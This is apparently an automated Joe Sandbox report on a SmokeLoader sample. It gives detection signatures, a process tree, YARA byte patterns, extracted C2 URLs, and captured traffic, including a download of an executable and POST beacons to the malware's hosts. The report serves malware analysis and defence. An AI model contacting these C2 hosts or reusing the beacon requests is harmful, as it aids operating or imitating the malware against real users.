Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:756294
MD5:1cf06beb83d2bd1afd1b9b62994e7549
SHA1:88bd7da7668fb669b5503696ee0a9c0f2dbeceb7
SHA256:4dc0de570728f75f844c7afb84ac6c809ef4620dac3b12a884ff9916f5b5b0ee
Tags:exeSmokeLoader
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Maps a DLL or memory area into another process
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Yara detected Keylogger Generic
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5200 cmdline: C:\Users\user\Desktop\file.exe MD5: 1CF06BEB83D2BD1AFD1B9B62994E7549)
    • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • ADCA.exe (PID: 1432 cmdline: C:\Users\user\AppData\Local\Temp\ADCA.exe MD5: 2479739C5D062ECB325147623241F007)
        • rundll32.exe (PID: 4912 cmdline: C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • WerFault.exe (PID: 4872 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
          • WerFault.exe (PID: 3808 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • 5AF.exe (PID: 5580 cmdline: C:\Users\user\AppData\Local\Temp\5AF.exe MD5: C81AB83835C2669DBE57C43DB54571B7)
  • dfhwrav (PID: 5440 cmdline: C:\Users\user\AppData\Roaming\dfhwrav MD5: 1CF06BEB83D2BD1AFD1B9B62994E7549)
  • 5AF.exe (PID: 2388 cmdline: "C:\Users\user\AppData\Local\Temp\5AF.exe" MD5: C81AB83835C2669DBE57C43DB54571B7)
  • cleanup

Malware Configuration

Threatname: SmokeLoader

{"C2 list": ["http://piratia.su/tmp/", "http://dowe.at/tmp/", "http://xisac.com/tmp/", "http://newhorizonswv.com/tmp/", "http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.491008397.00000000005E9000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0xff0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x744:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x344:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      Click to see the 20 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.file.exe.2070e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        0.2.file.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          9.3.dfhwrav.2080000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            9.2.dfhwrav.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              9.2.dfhwrav.6d0e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                Click to see the 5 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                No Snort rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: file.exeVirustotal: Detection: 33%Perma Link
                Antivirus detection for URL or domain
                Source: http://piratia.su/tmp/URL Reputation: Label: malware
                Source: http://piratia.su/tmp/URL Reputation: Label: malware
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\dfhwravJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeJoe Sandbox ML: detected
                Source: 22.2.5AF.exe.23be12c.2.unpackAvira: Label: TR/Patched.Ren.Gen7
                Source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://piratia.su/tmp/", "http://dowe.at/tmp/", "http://xisac.com/tmp/", "http://newhorizonswv.com/tmp/", "http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/"]}
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_00878884 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,10_2_00878884
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_00881940 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,10_2_00881940
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_0087885C CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,10_2_0087885C
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_008799FF CryptDestroyHash,10_2_008799FF
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_0087A511 CryptReleaseContext,10_2_0087A511
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_00884967 CryptReleaseContext,10_2_00884967
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_00883F6C CryptDestroyHash,10_2_00883F6C

                Exploits

                barindex
                Yara detected UAC Bypass using CMSTP
                Source: Yara matchFile source: 16.2.5AF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.2.5AF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000016.00000002.517229882.0000000000413000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.486093572.0000000000413000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY

                Compliance

                barindex
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeUnpacked PE file: 10.2.ADCA.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeUnpacked PE file: 16.2.5AF.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeUnpacked PE file: 22.2.5AF.exe.400000.0.unpack
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: unknownHTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.6:49739 version: TLS 1.2
                Source: Binary string: setupapi.pdbf source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, 5AF.exe, 00000016.00000002.522529716.00000000023B8000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: cryptbase.pdbD source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shcore.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\dohaf\kaxidin\wukoni\wefof\nojeyuve jucahazetozep zisasime.pdb0f source: 5AF.exe, 00000010.00000000.456599162.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000000.482478776.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: fltLib.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shell32.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msctf.pdby source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: comctl32v582.pdbB source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wsspicli.pdb6 source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: fltLib.pdbR source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: mpr.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mpr.pdbA source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: sechost.pdb0 source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: setupapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Qrundll32.pdb source: WerFault.exe, 00000013.00000003.506255817.0000000004740000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.489353790.000000000473F000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.494807738.000000000473F000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: Qrundll32.pdb^t source: WerFault.exe, 00000013.00000003.527460296.0000000004740000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.527287787.0000000004740000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: shcore.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: 5AF.exe, 00000010.00000002.485930859.0000000000410000.00000040.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000002.517131758.0000000000410000.00000040.00000001.01000000.0000000B.sdmp
                Source: Binary string: C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb source: ADCA.exe, 0000000A.00000000.410105733.0000000000401000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: profapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: winspool.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: iphlpapi.pdbz source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: shell32.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sechost.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: combase.pdbt source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: 5C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb0f source: ADCA.exe, 0000000A.00000000.410105733.0000000000401000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: propsys.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: powrprof.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msctf.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\yepiro_lafonu\vekamogudit62\deney\jef.pdb source: file.exe, 00000000.00000000.243494837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, dfhwrav, 00000009.00000000.369163815.0000000000401000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: ole32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: version.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: propsys.pdb` source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sfc.pdbB source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: oleaut32.pdbl source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: IC:\yepiro_lafonu\vekamogudit62\deney\jef.pdb0f source: file.exe, 00000000.00000000.243494837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, dfhwrav, 00000009.00000000.369163815.0000000000401000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: advapi32.pdbJ source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: netapi32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: combase.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, 5AF.exe, 00000016.00000002.522529716.00000000023B8000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: rundll32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sfc.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: powrprof.pdbX source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: apphelp.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\dohaf\kaxidin\wukoni\wefof\nojeyuve jucahazetozep zisasime.pdb source: 5AF.exe, 00000010.00000000.456599162.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000000.482478776.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: wuser32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: profapi.pdb^ source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: netutils.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: netapi32.pdbk source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_0040D450 FindFirstFileW,FindClose,10_2_0040D450
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_004235B0 FindFirstFileW,FindClose,10_2_004235B0
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_0040CE84 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,10_2_0040CE84

                Networking

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeDomain query: thepokeway.nl
                Source: C:\Windows\explorer.exeNetwork Connect: 123.253.32.170 80Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: dowe.at
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://piratia.su/tmp/
                Source: Malware configuration extractorURLs: http://dowe.at/tmp/
                Source: Malware configuration extractorURLs: http://xisac.com/tmp/
                Source: Malware configuration extractorURLs: http://newhorizonswv.com/tmp/
                Source: Malware configuration extractorURLs: http://cracker.biz/tmp/
                Source: Malware configuration extractorURLs: http://piratia-life.ru/tmp/
                Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                Source: Joe Sandbox ViewIP Address: 5.135.247.111 5.135.247.111
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.2Date: Tue, 29 Nov 2022 23:11:06 GMTContent-Type: application/octet-streamContent-Length: 3776000Last-Modified: Tue, 29 Nov 2022 23:10:03 GMTConnection: keep-aliveETag: "6386914b-399e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 71 fa 27 a0 35 9b 49 f3 35 9b 49 f3 35 9b 49 f3 88 d4 df f3 34 9b 49 f3 2b c9 dc f3 24 9b 49 f3 2b c9 ca f3 5d 9b 49 f3 12 5d 32 f3 32 9b 49 f3 35 9b 48 f3 af 9b 49 f3 2b c9 cd f3 17 9b 49 f3 2b c9 dd f3 34 9b 49 f3 2b c9 d8 f3 34 9b 49 f3 52 69 63 68 35 9b 49 f3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a2 ac e5 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 08 01 00 00 02 3c 00 00 00 00 00 97 4c 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 4f 00 00 04 00 00 01 9d 3a 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c 0a 01 00 50 00 00 00 00 c0 3c 00 50 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 2d 00 00 18 00 00 00 d8 2c 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 07 01 00 00 10 00 00 00 08 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 97 3b 00 00 20 01 00 00 60 38 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 50 12 00 00 c0 3c 00 00 32 00 00 00 6c 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: GET /upload/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: thepokeway.nl
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tajcoxqjmd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://owxfgf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dqkjujneki.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yfupv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: dowe.at
